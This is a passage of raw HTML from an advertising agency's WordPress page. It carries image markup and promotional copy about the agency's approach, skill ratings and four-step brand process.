et_pb_text_align_center et_pb_bg_layout_light et_pb_with_title\" data-number-value=\"906\" data-number-separator=\"\">\n				\n				\n				<div class=\"percent\" ><p><span class=\"percent-value\"></span><span class=\"percent-sign\"></span></p></div>\n				<h3 class=\"title\">Cups Of Coffee</h3>\n			</div><!-- .et_pb_number_counter -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_11 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_16 et_pb_row_fullwidth et_pb_gutters4\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_25  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_3 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&#038;ssl=1\" alt=\"Why We\" title=\"Why-we\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=300%2C233&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=768%2C597&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=480%2C373&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=1080&#038;ssl=1\" alt=\"Why We\" title=\"Why-we\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=300%2C233&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=768%2C597&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Why-we.jpg?resize=480%2C373&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_26  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_15 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Why choose us?</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_16 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.<br />\nWe help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_button_module_wrapper et_pb_button_1_wrapper  et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_1 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"#\" data-icon=\"&#x45;\">Learn More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_12 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_17 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_27  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_17 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our Latest Work</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_18 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_13 et_pb_specialty_fullwidth et_pb_equal_columns et_pb_with_background et_section_specialty\" >\n				\n				\n				\n				<div class=\"et_pb_row et_pb_gutters1\">\n					<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_28    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_4 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design\" title=\"packaging design by what the hell\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&amp;ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&amp;ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design\" title=\"packaging design by what the hell\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?w=800&ssl=1 800w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=300%2C300&ssl=1 300w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=150%2C150&ssl=1 150w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=768%2C768&ssl=1 768w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800-w.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_29   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_row_inner et_pb_row_inner_0\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_5 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?w=1080&#038;ssl=1\" alt title=\"217x434\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?w=434&amp;ssl=1 434w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?resize=300%2C150&amp;ssl=1 300w\" data-lazy-sizes=\"(max-width: 434px) 100vw, 434px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?w=1080&#038;ssl=1\" alt=\"\" title=\"217x434\" srcset=\"https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?w=434&ssl=1 434w, https://i1.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/217x434.jpg?resize=300%2C150&ssl=1 300w\" sizes=\"(max-width: 434px) 100vw, 434px\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_1\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_1\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_6 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"Creative graphic designing\" title=\"Creative graphic designing\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&amp;ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=1080&#038;ssl=1\" alt=\"Creative graphic designing\" title=\"Creative graphic designing\" srcset=\"https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?w=800&ssl=1 800w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=300%2C300&ssl=1 300w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=150%2C150&ssl=1 150w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=768%2C768&ssl=1 768w, https://i0.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_2 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_7 et_animated et-waypoint\">\n				\n				\n				<a href=\"#\"><span class=\"et_pb_image_wrap has-box-shadow-overlay\"><div class=\"box-shadow-overlay\"></div><img src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&amp;ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i0.wp.com/whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=1080&#038;ssl=1\" alt=\"Packaging Design creative agency\" title=\"packaging design creative advertising agency\" srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?w=800&ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=300%2C300&ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=150%2C150&ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=768%2C768&ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/800x800..1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner -->\n			</div> <!-- .et_pb_column -->\n				</div> <!-- .et_pb_row -->\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_14 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_18\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_30  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_custom_button_icon et_pb_button_2 et_animated et_hover_enabled et_pb_bg_layout_light\" href=\"#\" data-icon=\"&#x45;\">See More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_15 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_19 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_31  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_19 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our Skills</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_20 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_20\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_32  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_21 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_33  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<ul class=\"et_pb_module et_pb_counters et_pb_counters_0 et_animated et-waypoint et_pb_bg_layout_light\">\n				<li class=\"et_pb_counter et_pb_counter_0\">\n				<span class=\"et_pb_counter_title\">Branding &#8211; 90%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"90%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"90%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li><li class=\"et_pb_counter et_pb_counter_1\">\n				<span class=\"et_pb_counter_title\">Lead/Sales Generation Campaign &#8211; 77%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"77%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"77%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li><li class=\"et_pb_counter et_pb_counter_2\">\n				<span class=\"et_pb_counter_title\">Digital Advertising &#8211; 85%</span>\n				<span class=\"et_pb_counter_container\">\n					\n					\n					<span class=\"et_pb_counter_amount\" style=\"\" data-width=\"85%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n					<span class=\"et_pb_counter_amount overlay\" style=\"\" data-width=\"85%\"><span class=\"et_pb_counter_amount_number\"><span class=\"et_pb_counter_amount_number_inner\"></span></span></span>\n				</span>\n			</li>\n			</ul> <!-- .et_pb_counters -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_16 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_21\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_34  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_8 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&#038;ssl=1\" alt=\"Best Advertising agency\" title=\"best-advertising-agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&amp;ssl=1 1080w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=300%2C172&amp;ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=1024%2C586&amp;ssl=1 1024w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=768%2C439&amp;ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=980%2C561&amp;ssl=1 980w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=480%2C275&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 1080px) 100vw, 1080px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&#038;ssl=1\" alt=\"Best Advertising agency\" title=\"best-advertising-agency\" srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?w=1080&ssl=1 1080w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=300%2C172&ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=1024%2C586&ssl=1 1024w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=768%2C439&ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=980%2C561&ssl=1 980w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-Copy-12-1.png?resize=480%2C275&ssl=1 480w\" sizes=\"(max-width: 1080px) 100vw, 1080px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_17 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_22\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_35  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_22 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT&#8217;S AN AD</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_18 et_pb_specialty_fullwidth et_pb_equal_columns et_pb_with_background et_section_specialty\" >\n				\n				\n				\n				<div class=\"et_pb_row et_pb_gutters1\">\n					<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_36   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_row_inner et_pb_row_inner_2 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_23 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Easy to start</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_24 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Just four steps</p>\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_3 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_4\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_6 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x5a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>01. BRAND AUDIT</span></h4>\n						<div class=\"et_pb_blurb_description\">Analyzing the brand with all the key parameter (As per operating environment and competition)</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_5 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_7 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe609;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>02. STRATEGY</span></h4>\n						<div class=\"et_pb_blurb_description\">Starting with the summary of the plan, Defining TG, Writing/Creating USP</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner --><div class=\"et_pb_row_inner et_pb_row_inner_4 et_pb_equal_columns et_pb_gutters3\">\n				<div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_6\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_8 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#x5a;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>03. EXECUTION</span></h4>\n						<div class=\"et_pb_blurb_description\">Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_4 et_pb_column_inner et_pb_column_inner_7 et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_9 et_animated  et_pb_text_align_center  et_pb_blurb_position_top et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-waypoint et_pb_animation_top et-pb-icon\">&#xe609;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\"><span>04. EVALUATION</span></h4>\n						<div class=\"et_pb_blurb_description\">The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</div>\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row_inner -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_37    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_9 et_animated et-waypoint\">\n				\n				\n				<span class=\"et_pb_image_wrap \"><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&#038;ssl=1\" alt=\"digital marketing agency\" title=\"digital-marketing-agency\" data-recalc-dims=\"1\" data-lazy-srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=800&amp;ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=480%2C480&amp;ssl=1 480w\" data-lazy-sizes=\"(max-width: 800px) 100vw, 800px\" data-lazy-src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i2.wp.com/whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=1080&#038;ssl=1\" alt=\"digital marketing agency\" title=\"digital-marketing-agency\" 